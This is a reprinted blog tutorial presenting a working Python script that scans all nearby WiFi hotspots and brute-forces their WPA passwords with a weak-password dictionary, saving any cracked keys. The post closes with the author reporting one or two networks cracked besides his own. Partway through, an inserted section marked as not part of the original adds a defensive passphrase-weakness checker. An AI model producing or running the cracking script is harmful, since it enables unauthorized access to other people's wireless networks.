Abstract: I should say up front that this script is nothing high-end, and it even looks a bit rough. It is also single-threaded, because I am moving in a few days.
Environment Preparation
- Python 2.7
- A working Linux system
- A decent wireless card
- The pywifi module
- A weak-password dictionary
- Clear any saved WiFi connection records from the system (very important!!!)
First of all, this module is fairly weak on Windows: the author did not wrap wlan_security_attributes properly when calling wlanapi, so I recommend running it under Linux. I tested with the Python 2.7.6 that ships with Kali 2.0, where it can be installed directly with pip install pywifi.
Import Module
Only these three modules are used here. In pywifi's _wifiutil_linux.py script, the check if reply != b'OK\n': in the _send_cmd_to_wpas method needs to be modified, otherwise a lot of messages are printed.

    from pywifi import *
    import time
    import sys
Dictionary Preparation
Efficiency matters a great deal, because this thing is really slow to run. The following are the TOP10 most commonly used weak WiFi passwords:
- 12345678
- 123456789
- 88888888
- 1234567890
- 00000000
- 87654321
- 66668888
- 11223344
- 147258369
- 11111111
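The ten entries above share a few structural patterns: digits only, repeated characters, and number-row or keypad walks. As an added example that is not part of the original post, the following defender-side check flags a proposed WPA2 passphrase that falls into those patterns; the function name `weakness` and the pattern rules are assumptions made for this illustration and deliberately generalize beyond the ten listed values.

```python
from itertools import groupby

# The TOP10 list from this page, used as an exact-match blocklist.
TOP10 = ["12345678", "123456789", "88888888", "1234567890", "00000000",
         "87654321", "66668888", "11223344", "147258369", "11111111"]

# Number-row and numpad-column walks (assumed pattern set, not from the post).
WALKS = ["1234567890", "0987654321", "147258369", "963852741",
         "741852963", "369258147"]


def weakness(passphrase):
    """Return the reasons a WPA2-PSK passphrase is weak (empty list = none found)."""
    reasons = []
    if not 8 <= len(passphrase) <= 63:
        reasons.append("length outside the 8-63 characters WPA2-PSK accepts")
    if passphrase in TOP10:
        reasons.append("on the TOP10 list")
    if passphrase.isdigit():
        reasons.append("digits only")
    if len(set(passphrase)) <= 2:
        reasons.append("two or fewer distinct characters")
    # Every run of identical characters has length >= 2: 11223344, 66668888.
    # groupby is used instead of a nested-quantifier regex to avoid backtracking blowup.
    if passphrase and all(len(list(g)) >= 2 for _, g in groupby(passphrase)):
        reasons.append("built only from repeated characters")
    # Whole string is a slice of a walk, allowing wrap-around: 87654321, 147258369.
    if len(passphrase) >= 4 and any(passphrase in w + w for w in WALKS):
        reasons.append("keypad or sequential walk")
    return reasons


def audit(candidates):
    """Map each weak candidate to its reasons; strong candidates are omitted."""
    return {p: weakness(p) for p in candidates if weakness(p)}


if __name__ == "__main__":
    # Constructed sample input: the page's list plus one long mixed passphrase.
    for phrase, why in sorted(audit(TOP10 + ["correct-horse-battery-staple"]).items()):
        print("%-12s %s" % (phrase, "; ".join(why)))
```

Run against a router's current or proposed passphrase before deployment; an empty result only means none of these patterns matched, not that the passphrase is strong.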
Configuring the Scanner
The recommended scan duration is between 15 and 20 seconds. The test duration can be customized; because authentication speed depends on distance, I generally set it to about 15. Anything that needs longer than that has a signal that is not much use, even if the hotspot is cracked.

    def main():
        # scan duration
        scantimes = 3
        # delay for a single password test
        testtimes = 15
        output = sys.stdout
        # path where the result file is saved
        files = "TestRes.txt"
        # dictionary list
        keys = open(sys.argv[1], "r").readlines()
        print "|KEYS %s" % (len(keys))
        # instantiate a PyWiFi object
        wifi = PyWiFi()
        # select a network card and assign it to iface
        iface = wifi.interfaces()[0]
        # scan with iface for scantimes seconds and get the basic configuration of nearby hotspots
        scanres = scans(iface, scantimes)
        # count the hotspots found nearby
        nums = len(scanres)
        print "|SCAN GET %s" % (nums)
        print "%s\n%-*s|%-*s|%-*s|%-*s |%-*s |%-*s%*s \n%s" % ("-"*70, 6, "wifiid", 18, "SSID OR BSSID", 2, "N", 4, "Time", 7, "Signal", 10, "Keynum", 10, "KEY", "="*70)
        # test each hotspot in turn
        for i, x in enumerate(scanres):
            # once a test completes, a successful result is stored in files
            res = test(nums-i, iface, x, keys, output, testtimes)
            if res:
                open(files, "a").write(res)
Scanning Nearby Hotspots

    def scans(face, timeout):
        # start scanning
        face.scan()
        time.sleep(timeout)
        # get the scan results after a few seconds
        return face.scan_results()
Hotspot Test
As a follow-up, I recommend persisting the data from the scanning process, which prevents duplicate scans and makes the results easier to read.

    def test(i, face, x, key, stu, ts):
        # display the network name; because some Chinese names display badly, show the BSSID instead
        showID = x.bssid if len(x.ssid) > len(x.bssid) else x.ssid
        # iterate over the dictionary, trying each password
        for n, k in enumerate(key):
            x.key = k.strip()
            # remove all hotspot configurations
            face.remove_all_network_profiles()
            # try to connect using the packaged target
            face.connect(face.add_network_profile(x))
            # initialize the status code; 0 is avoided because it causes logic errors
            code = 10
            t1 = time.time()
            # poll the state in a loop: 0 means wrong password; on timeout move on to the next one
            while code != 0:
                time.sleep(0.1)
                code = face.status()
                now = time.time() - t1
                if now > ts:
                    break
                stu.write("\r%-*s|%-*s|%s |%*.2fs|%-*s | %-*s%*s" % (6, i, 18, showID, code, 5, now, 7, x.signal, 10, len(key)-n, 10, k.replace("\n", "")))
                stu.flush()
                if code == 4:
                    face.disconnect()
                    return "%-*s|%s |%*s |%*s\n" % (20, x.ssid, x.bssid, 3, x.signal, 15, k)
        return False
Case
This shows that the test used 11 weak passwords and the scan found 20 hotspots, after which the painfully slow run began.
- wifiid: the hotspot's ID number, which decreases by 1 for each one tested.
- SSID or BSSID: the hotspot's SSID name or MAC address
- N: the connection state of the hotspot, this
- time: the time spent so far
- signal: the signal strength of the hotspot; the smaller the better
- keynum: the ID of the password being tested, which decreases by 1 for each one tested.
- Key: the password currently being tested
The result is not bad: everyone's security awareness is not as dismal as it used to be. The sweep turned up one or two, and one of them was my own.
Reprinted from: https://my.oschina.net/Apathy/blog/821039
A very easy to understand WiFi password blasting python script